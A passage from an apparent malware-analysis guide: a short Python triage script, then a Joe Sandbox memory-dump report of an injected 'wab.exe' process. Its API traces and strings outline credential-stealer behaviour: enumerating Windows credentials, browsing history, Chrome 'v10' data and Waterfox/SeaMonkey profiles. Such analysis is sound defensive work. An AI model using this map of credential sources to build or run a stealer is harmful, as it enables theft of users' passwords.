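            findings.append(Finding(rec.opcode_id[:8], hits))
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_REPORT):
        print(f.function)
        for h in f.hits:
            print("   ", h)
```

Run it against the report's page text (copy the records into SAMPLE_REPORT or read a saved text export) to get a short list of functions worth opening in the memory dump first; the CRT start-up record at the end of the excerpt is correctly dropped because it references none of the indicators.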

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                  • String ID: $/deleteregkey$/savelangfile
                  • API String ID: 2744995895-28296030
                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                  • wcsrchr.MSVCRT ref: 0040B738
                  • memset.MSVCRT ref: 0040B756
                  • memset.MSVCRT ref: 0040B7F5
                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                  • memset.MSVCRT ref: 0040B851
                  • memset.MSVCRT ref: 0040B8CA
                  • memcmp.MSVCRT ref: 0040B9BF
                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                  • memset.MSVCRT ref: 0040BB53
                  • memcpy.MSVCRT ref: 0040BB66
                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                  • String ID: chp$v10
                  • API String ID: 170802307-2783969131
                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                  Control-flow Graph

control_flow_graph: function at 40e2ab (rendered graph; node/edge list omitted, see the APIs and Strings below)
                  APIs
                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                  • memset.MSVCRT ref: 0040E380
                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                  • wcschr.MSVCRT ref: 0040E3B8
                  • memcpy.MSVCRT ref: 0040E3EC
                  • memcpy.MSVCRT ref: 0040E407
                  • memcpy.MSVCRT ref: 0040E422
                  • memcpy.MSVCRT ref: 0040E43D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                  • API String ID: 3073804840-2252543386
                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                  Control-flow Graph

control_flow_graph: function at 4091b8 (rendered graph; node/edge list omitted, see the APIs and Strings below)
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                  • String ID:
                  • API String ID: 3715365532-3916222277
                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                  • CloseHandle.KERNEL32(?), ref: 0040E148
                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                  • String ID: bhv
                  • API String ID: 327780389-2689659898
                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                  Control-flow Graph

control_flow_graph: function at 413f4f (rendered graph; node/edge list omitted, see the APIs and Strings below)
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                  • API String ID: 2941347001-70141382
                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                  Control-flow Graph

control_flow_graph: function at 4466f4 (rendered graph; node/edge list omitted, see the APIs below)
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                  • String ID:
                  • API String ID: 2827331108-0
                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0040C298
                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                  • wcschr.MSVCRT ref: 0040C324
                  • wcschr.MSVCRT ref: 0040C344
                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                  • GetLastError.KERNEL32 ref: 0040C373
                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                  • String ID: visited:
                  • API String ID: 1157525455-1702587658
                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                  Control-flow Graph

control_flow_graph: function at 40e175 (rendered graph; node/edge list omitted, see the APIs and Strings below)
                  APIs
                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                  • memset.MSVCRT ref: 0040E1BD
                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                  • _snwprintf.MSVCRT ref: 0040E257
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                  • API String ID: 3883404497-2982631422
                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                  • memset.MSVCRT ref: 0040BC75
                  • memset.MSVCRT ref: 0040BC8C
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                  • memcmp.MSVCRT ref: 0040BCD6
                  • memcpy.MSVCRT ref: 0040BD2B
                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                  • String ID:
                  • API String ID: 509814883-3916222277
                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                  Control-flow Graph

control_flow_graph: function at 41837f (rendered graph; node/edge list omitted, see the APIs and Strings below)
                  APIs
                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                  • GetLastError.KERNEL32 ref: 0041847E
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile$??3@ErrorLast
                  • String ID: |A
                  • API String ID: 1407640353-1717621600
                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                  • String ID: r!A
                  • API String ID: 2791114272-628097481
                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                  APIs
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                  • _wcslwr.MSVCRT ref: 0040C817
                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                  • wcslen.MSVCRT ref: 0040C82C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                  • API String ID: 62308376-4196376884
                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                  APIs
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                  • wcslen.MSVCRT ref: 0040BE06
                  • _wcsncoll.MSVCRT ref: 0040BE38
                  • memset.MSVCRT ref: 0040BE91
                  • memcpy.MSVCRT ref: 0040BEB2
                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                  • wcschr.MSVCRT ref: 0040BF24
                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                  • String ID:
                  • API String ID: 3191383707-0
                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                  APIs
                  • memset.MSVCRT ref: 00403CBF
                  • memset.MSVCRT ref: 00403CD4
                  • memset.MSVCRT ref: 00403CE9
                  • memset.MSVCRT ref: 00403CFE
                  • memset.MSVCRT ref: 00403D13
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 00403DDA
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Waterfox$Waterfox\Profiles
                  • API String ID: 3527940856-11920434
                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                  APIs
                  • memset.MSVCRT ref: 00403E50
                  • memset.MSVCRT ref: 00403E65
                  • memset.MSVCRT ref: 00403E7A
                  • memset.MSVCRT ref: 00403E8F
                  • memset.MSVCRT ref: 00403EA4
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 00403F6B
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                  • API String ID: 3527940856-2068335096
                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
